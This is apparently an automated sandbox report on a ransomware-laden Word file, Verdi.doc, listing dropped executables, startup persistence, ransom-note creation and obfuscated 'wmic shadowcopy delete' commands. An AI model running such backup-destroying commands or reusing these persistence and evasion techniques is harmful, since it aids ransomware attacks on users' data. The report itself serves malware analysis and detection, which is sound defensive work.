Source: Verdi.doc	OLE indicator has summary info: false
Source: Verdi.doc	OLE indicator has summary info: false

Document has an unknown application name

Show sources

Source: Verdi.doc	OLE indicator application name: unknown
Source: Verdi.doc	OLE indicator application name: unknown

Dropped file seen in connection with other malware

Show sources

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp 806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627
Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\wupd12.14.tmp 806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627

Reads the hosts file

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal100.rans.spre.phis.spyw.expl.evad.winDOC@9/176@0/9

Contains functionality to instantiate COM classes

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Code function: 5_2_0043947E CoInitializeEx,Sleep,CoCreateInstance,CoUninitialize,

5_2_0043947E

Creates files inside the program directory

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

File created: C:\Program Files\5e4c085c3c4e0000.tmp

Jump to behavior

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Verdi.doc

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVRB699.tmp

Jump to behavior

Document contains summary information with irregular field values

Show sources

Source: Verdi.doc	OLE document summary: title field not present or empty
Source: Verdi.doc	OLE document summary: author field not present or empty
Source: Verdi.doc	OLE document summary: edited time not present or 0
Source: Verdi.doc	OLE document summary: title field not present or empty
Source: Verdi.doc	OLE document summary: author field not present or empty
Source: Verdi.doc	OLE document summary: edited time not present or 0

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: Verdi.doc

Virustotal: Detection: 50%

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\Temp\wupd12.14.tmp C:\Windows\Temp\wupd12.14.tmp
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: unknown	Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\Temp\wupd12.14.tmp C:\Windows\Temp\wupd12.14.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Writes ini files

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini

Jump to behavior

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Uses Rich Edit Controls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\system32\MSFTEDIT.DLL

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Document is a ZIP file with path names indicative of goodware

Show sources

Source: Verdi.doc	Initial sample: OLE zip file path = word/media/image3.wmf
Source: Verdi.doc	Initial sample: OLE zip file path = word/media/image4.jpeg

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Creates a directory in C:\Program Files

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Directory created: C:\Program Files\5e4c085c3c4e0000.tmp			Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory created: C:\Program Files\DECRYPT-FILES.txt			Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: scrrun.pdb source: WINWORD.EXE, 00000000.00000002.336869351.072F0000.00000002.00000001.sdmp
Source:	Binary string: InkEd.pdb source: WINWORD.EXE, 00000000.00000002.329912926.049B0000.00000002.00000001.sdmp
Source:	Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000000.00000002.328656328.03DE0000.00000002.00000001.sdmp

Document has a 'vbamacros' value indicative of goodware

Show sources

Source: Verdi.doc

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Unpacked PE file: 5.2.wupd12.14.tmp.400000.4.unpack .text:ER;.data:W;.rsrc:W;Unknown_Section3:W;Unknown_Section4:W; vs .text:ER;.rdata:R;.data:W;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Unpacked PE file: 5.2.wupd12.14.tmp.400000.4.unpack

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004320D0 push 000014CBh; retf	5_2_004320EE
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00421F8B
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_0042206E
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_004220B4
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422112
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422217
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422243
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422395
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422463
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_0042248C
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_004224DD
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_004225BD
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422671
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_0042271D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_0042288D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422A78
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422AFB
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422B2B
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422BC1
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422C73
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422CE0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422DE3
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422E07
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422ED1
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422F46
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 004219EFh; ret	5_2_00422FB5
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 0042300Dh; ret	5_2_0042336D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 0042300Dh; ret	5_2_0042340C
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 0042300Dh; ret	5_2_0042348C
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 0042300Dh; ret	5_2_004234B9
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 push 0042300Dh; ret	5_2_00423503

Persistence and Installation Behavior:

Infects executable files (exe, dll, sys, html)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	System file mapped for write: C:\Users\user\AppData\Roaming\.jre\Welcome.html			Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	System file written: C:\Users\user\AppData\Roaming\.jre\Welcome.html			Jump to behavior

Drops PE files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Windows\Temp\wupd12.14.tmp			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp			Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Windows\Temp\wupd12.14.tmp

Jump to dropped file

Searches for installed JRE in non-default directory

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\bin\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\bin\client\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\applet\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\cmm\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\deploy\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\ext\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\fonts\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\i386\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\jfr\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\management\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\ read data or list directory \| synchronize	Jump to behavior

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4c085c3c4e0000.tmp

Jump to behavior

Stores files to the Windows start menu directory

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\Default\Start Menu\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: C:\Users\user\Start Menu\5e4c085c3c4e0000.tmp	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Creates files in the recycle bin to hide itself

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

File created: C:\$Recycle.Bin\5e4c085c3c4e0000.tmp

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
